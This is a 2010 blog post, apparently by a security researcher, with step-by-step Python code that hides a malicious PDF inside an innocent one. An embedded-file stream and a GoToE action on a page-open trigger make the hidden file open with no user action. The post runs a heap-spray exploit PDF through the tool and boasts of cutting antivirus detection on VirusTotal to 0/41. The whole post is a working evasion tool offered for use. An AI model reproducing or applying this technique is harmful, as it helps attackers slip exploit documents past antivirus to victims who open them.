Generic PDF exploit hider. embedPDF.py and goodbye AV detection (01/2010) January 13, 2010

This post is about hiding an evil PDF inside an innocent one. The objective is to embed a PDF into another PDF and make the reader parse the embedded one without user intervention. If we manage to do this, we’ll be able to ‘filter’ the embedded file and hide it behind some PDF encoding filters (FlateDecode, Crypt, etc.), making it invisible from the outside. And finally, as we’ll be using miniPDF.py, we’ll pass everything through the (unfinished) obfuscated version of the miniPDF.py lib, here.



Hey! But, can we embed files into a PDF at all? Well as stated here …

PDF3200:2008.1::7.11.4 Embedded File Streams

If a PDF file contains file specifications that refer to an external file and the PDF file is archived or transmitted, some provision should be made to make sure that the external references will remain valid. One way to do this is to arrange for copies of the external files to accompany the PDF file. Embedded file streams (PDF 1.3) address this problem by allowing the contents of referenced files to be embedded directly within the body of the PDF file. This makes the PDF file a self-contained unit that can be stored or transmitted as a single entity. (The embedded files are included purely for convenience and need not be directly processed by any conforming reader.)

… YES we can. There are probably other ways to embed files, such as the relatively new PDF ‘collection’ feature, but that’s another story.

I) Embed a PDF into a PDF

OK, let’s start! The first thing we need is a clean PDF to hide. It needs to be one with a correct xref and a clean overall file structure. So, for a start we hide a good PDF, then we’ll see how to embed a bad one. There is a clean, minimalistic, text-displaying PDF generated in this post, the pdf here.
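If you want a quick sanity check that the PDF you are about to embed has a sane xref pointer, something like the following may help. It is only a rough sketch in plain Python (no miniPDF involved), the function name is made up for this example, and it only understands classic xref tables, not the cross-reference streams introduced in PDF 1.5.

```python
import re

def startxref_points_to_xref(pdf_bytes):
    """Return True if the last startxref offset lands on an 'xref' keyword.

    Assumption: the file uses a classic cross-reference table. Files that
    use cross-reference streams are reported as False by this sketch.
    """
    matches = re.findall(rb"startxref\s+(\d+)\s+%%EOF", pdf_bytes)
    if not matches:
        return False
    offset = int(matches[-1])
    return pdf_bytes[offset:offset + 4] == b"xref"

# A tiny hand-made file, just enough structure to exercise the check.
header = b"%PDF-1.3\n"
obj1 = b"1 0 obj\n<< /Type /Catalog >>\nendobj\n"
xref_offset = len(header) + len(obj1)
xref = (b"xref\n0 2\n0000000000 65535 f \n"
        + ("%010d 00000 n \n" % len(header)).encode("ascii"))
trailer = (b"trailer\n<< /Size 2 /Root 1 0 R >>\nstartxref\n"
           + str(xref_offset).encode("ascii") + b"\n%%EOF\n")
sample = header + obj1 + xref + trailer

print(startxref_points_to_xref(sample))
```

Prepending or inserting bytes without fixing the offset is the typical way this pointer goes stale, which is why a file that was edited by hand often fails this check.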

Now we need to construct the host PDF. We are not really interested in putting anything in it, so let’s construct an empty PDF (mostly as done for the JS-to_PDF post, here).

As in the earlier post first we import the lib and create a PDFDoc object representing a document in memory …

from miniPDF import *

#The PDF document

doc= PDFDoc()

Prepare the Pages dictionary, which is in charge of linking to the pages…

pages = PDFDict()

pages.add('Type', PDFName('Pages'))

doc.add(pages)

Prepare the Catalog dictionary.

catalog = PDFDict()

catalog.add('Type', PDFName('Catalog'))

catalog.add('Pages', PDFRef(pages))

doc.add(catalog)

The Catalog dictionary is the main root object of the PDF…

doc.setRoot(catalog)

We don’t really need any content in our host PDF.

We add an empty content stream for the dummy page,

contents = PDFStream('')

doc.add(contents)

and the single dummy page. Note that we NEED to honor the Parent link back to the Pages dictionary, otherwise our magic won’t work.

page = PDFDict()

page.add('Type', PDFName('Page'))

page.add('Parent', PDFRef(pages))

page.add('Contents', PDFRef(contents)) #<- NEEDED!

doc.add(page)

And finally populate the pages dictionary.

#link the page to the pages list

pages.add('Kids', PDFArray([PDFRef(page)]))

pages.add('Count', PDFNum(1))

And with this ..

print doc

it renders the incomplete base PDF to stdout. Something like this.

The incomplete pdf is here and the incomplete py, here. OK, we have an empty base pdf, now let’s ..

Insert an embedded file.

For this we need to:

(1) add the EmbeddedFile stream containing the actual embedded file data,

(2) build a FileSpec dictionary for it,

(3) construct the EmbeddedFiles list, and

(4) put that under the global names list in the Catalog.

(1) To add the EmbeddedFile stream to the document do something like this.

Get the filename to hide from the parameters, and load its content into memory…

import sys

#read the file to embed as raw bytes

fileStr = open(sys.argv[1], 'rb').read()

Construct an EmbeddedFile dictionary as stated in PDF3200:2008.1::7.11.4(Embedded File Streams)

import hashlib

ef = PDFStream(fileStr)

ef.add('Type', PDFName('EmbeddedFile'))

ef.add('Subtype', PDFName('application#2Fpdf'))

ef.add('Params', PDFDict({'Size': PDFNum(len(fileStr)),

'CheckSum': PDFOctalString(hashlib.md5(fileStr).digest())}))

ef.add('DL', ' %d ' % len(fileStr))

#add the stream to the document so it can be referenced later

doc.add(ef)

Note that the ‘Type’, ‘Subtype’ and ‘Params’ tags are not strictly necessary.
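To make the Params entries a bit more concrete, here is a rough standalone sketch of how the Size and CheckSum values come about. It uses only the standard library; the helper names are invented for this example and are not the miniPDF API, and the octal escaping is just my guess at what something like PDFOctalString produces.

```python
import hashlib

def octal_literal(data):
    """Render bytes as a PDF literal string made only of \\ddd octal escapes."""
    return "(" + "".join("\\%03o" % byte for byte in data) + ")"

def embedded_file_params(data):
    """Build the text of a Params dictionary for an embedded file.

    Size is the byte length of the file and CheckSum is its 16-byte MD5 digest.
    """
    digest = hashlib.md5(data).digest()
    return "<< /Size %d /CheckSum %s >>" % (len(data), octal_literal(digest))

print(embedded_file_params(b"AAAA"))
```

Escaping every byte is wasteful but keeps the string free of unbalanced parentheses and other characters that would need special care.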

EXAMPLE: If we embed a file containing only “AAAA” the resulting EmbeddedFile stream will look like…

N 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Fpdf /DL 4 /Length 4 /Params << /CheckSum (\256\133\106\214\16707\241\363\323... /Size 5 >> >>
stream
AAAA
endstream
endobj
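In case the ‘#2F’ in the Subtype looks odd: a slash is a delimiter in PDF syntax, so inside a name it has to be written as ‘#’ plus its two-digit hex code. Here is a small sketch of that escaping rule as I read PDF3200:2008.1::7.3.5. The function name is made up for this example, and it is not part of miniPDF.

```python
def escape_pdf_name(name):
    """Escape the characters of a PDF name (without the leading slash).

    Bytes outside '!'..'~', the PDF delimiters and '#' itself are written
    as '#' followed by two hex digits; everything else is kept as-is.
    """
    delimiters = b"()<>[]{}/%"
    out = []
    for byte in name.encode("utf-8"):
        if 0x21 <= byte <= 0x7E and byte not in delimiters and byte != 0x23:
            out.append(chr(byte))
        else:
            out.append("#%02X" % byte)
    return "".join(out)

print("/" + escape_pdf_name("application/pdf"))  # prints /application#2Fpdf
```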

(2) Now we’ll construct the FileSpec dictionary for it.

As stated in the rather confusing PDF3200:2008.1::7.11.3(File Specification Dictionaries), a file specification dictionary for an embedded file will need to have these tags in it…

Key (type): value

Type (name): The type of PDF object that this dictionary describes; shall be Filespec for a file specification dictionary.

F (string): A file specification string of the form described in PDF3200:2008.1::7.11.2, “File Specification Strings”.

EF (dictionary): A dictionary containing a subset of the keys F, UF, DOS, Mac, and Unix, corresponding to the entries by those names in the file specification dictionary. The value of each such key shall be an embedded file stream (see 7.11.4, “Embedded File Streams”) containing the corresponding file. If this entry is present, the Type entry is required and the file specification dictionary shall be indirectly referenced. The F and UF entries should be used in place of the DOS, Mac, or Unix entries.

So, my version of the FileSpec dictionary follows.

First we need the dictionary that goes under the EF tag of the Filespec dictionary: one containing a subset of the keys F, UF, DOS, Mac, and Unix, each pointing to an embedded file stream. Damn! This is confusing. Basically we need a dictionary that looks like this…

<< /F N 0 R >>

Where “N 0 R” refers to the EmbeddedFile stream object. Here you have the code…

embeddedlst = PDFDict()

embeddedlst.add('F', PDFRef(ef))

Let’s construct the actual Filespec dictionary. Note that I’ve hardcoded the name to ‘file.pdf’ and that this should be revisited if we are trying to embed more than one file.

filespec = PDFDict()

filespec.add('Type', PDFName('Filespec'))

filespec.add('F', PDFString('file.pdf'))

filespec.add('EF', embeddedlst)

doc.add(filespec)

Excellent!! We are getting closer to the ultimate PDF hider!! The Filespec dictionary will look like this…

M 0 obj
<< /Type /Filespec /F (file.pdf) /EF << /F N 0 R >> >>
endobj

(3) Now we need to build the EmbeddedFiles list.

That’s easy, just build a dictionary that has a Names tag. Then put in it an array of pairs mapping a UTF-16 encoded name to the filespec dictionary. In a few words, it should be something like this…

<< /Names [<fffe610074007400610063006800> M 0 R] >>

… where <fffe610074007400610063006800> is the utf-16 PDFHexString of the string “attach” and “M 0 R” is a reference to the filespec dictionary.

The code will be similar to this…

namesToFiles = PDFDict()

namesToFiles.add('Names', PDFArray([PDFHexString('attach'.encode('utf-16')), PDFRef(filespec)]))
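If you are wondering where those hex digits come from, here is a tiny standalone sketch. Python’s 'utf-16' codec prepends a byte order mark and uses the machine’s native byte order, which on a little-endian box gives the FF FE prefix seen above. To make the result reproducible everywhere, this sketch pins the byte order explicitly; the helper name is made up for this example.

```python
import binascii

def utf16_hex_name(text):
    """Hex string form of `text` as little-endian UTF-16 with an FF FE BOM."""
    raw = b"\xff\xfe" + text.encode("utf-16-le")
    return "<" + binascii.hexlify(raw).decode("ascii") + ">"

print(utf16_hex_name("attach"))  # prints <fffe610074007400610063006800>
```

As far as I can tell the spec describes Unicode text strings as big-endian with an FE FF marker, so the little-endian form here simply mirrors what the code in this post emitted.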

(4) And finally we put it under the global names list in the Catalog.

We create the Names dictionary and add it to the document…

names = PDFDict()

doc.add(names)

… then add the EmbeddedFiles entry as stated in PDF3200:2008.1::7.7.4(Name Dictionary). And finally link it from the Catalog.

names.add('EmbeddedFiles', namesToFiles)

catalog.add('Names', PDFRef(names))

WE HAVE EMBEDDED A FILE!!!

The still incomplete PDF with an embedded file containing “AAAA” is demonstrated here, and it actually has something under the ‘paper clip’, check it out …

II) Jump to the embedded PDF with GoToE

Now that we have added an embedded PDF to a PDF, we’ll want to jump to it without user intervention and (why not) without JavaScript.

For this we’ll set up a GoToE action and link it to the OpenAction or some other trigger dictionary in the document.

An action dictionary defines the characteristics and behaviour of an action, and it is described in PDF3200:2008.1::12.6.2(Action Dictionaries).

Embedded go-to actions give a complete facility for linking between a file in a hierarchy of nested embedded files and another file in the same or a different hierarchy. The GoToE action is described in PDF3200:2008.1::12.6.4.4(Embedded Go-To Actions), but basically it looks like this…

<< /S /GoToE /T <</N <fffe610074007400610063006800> /R /C /NewWindow false >> /NewWindow false >>

…where the N tag refers to the utf-16 encoded name of the embedded file. The code for this action follows.

action = PDFDict()

action.add('S', PDFName('GoToE'))

action.add('NewWindow', PDFBool(False))

#N must match the name used in the EmbeddedFiles list

action.add('T', PDFDict({'N': PDFHexString('attach'.encode('utf-16')), 'R': PDFName('C'), 'NewWindow': PDFBool(False)}))

doc.add(action)

Setting the NewWindow tag to True or False may change how the reader opens the hidden file. Funny things may happen when run from inside a browser (!).

OK, all we have left is linking this action to some trigger that won’t draw the user’s attention. We have OpenAction, but let’s try something a lil different now. Let’s attach one of those AA trigger dictionaries to the single dummy page of the host PDF. That’s done with something like this…

page.add('AA', PDFDict({'O': PDFRef(action)}))

And finally render it out to stdout…

print doc #:)

And since the script expects the PDF to hide as a parameter, we can use it like this…



python embeddPDF.py evil.pdf > goodness.pdf



For a quick look on a representative sample of this code check here.

III) The virustotal.com test

It’s time for the virustotal.com test. I’ll try to hide the evilness of some PDF by embedding it into one of our host PDFs, as described previously, and see what happens.

I’m tired so I’ll pick one not-so-evil PDF I got from my previous post: a small PDF with a JavaScript OpenAction featuring an obscene heap spray, usually easily detected by AVs. That gave this result on virustotal.com, a score of 14 out of 41.

Now let’s embed it with our embeddPDF.py… I got this pdf. When passed to virustotal.com it got detected by 2 of 41 AVs. Here you have the result. Damn! 0 out of 41 seems to be hard to get. Let’s try it again, but this time using the obfuscated miniPDF.py version together with embeddPDF.py. I got this pdf. I passed it to virustotal… and got

-danger- !! 0/41 !! -danger-



No AV has detected it!!

I suppose there are 1mill ways to accomplish this but it still feels g00d! The results here.

A complete test bundle with most of the code is here.

f/



UPDATE(5:19 AM Jan 17th) ::

Nice! We had an improvement! Now detected by 3/41 AVs. http://bit.ly/8Xabw4.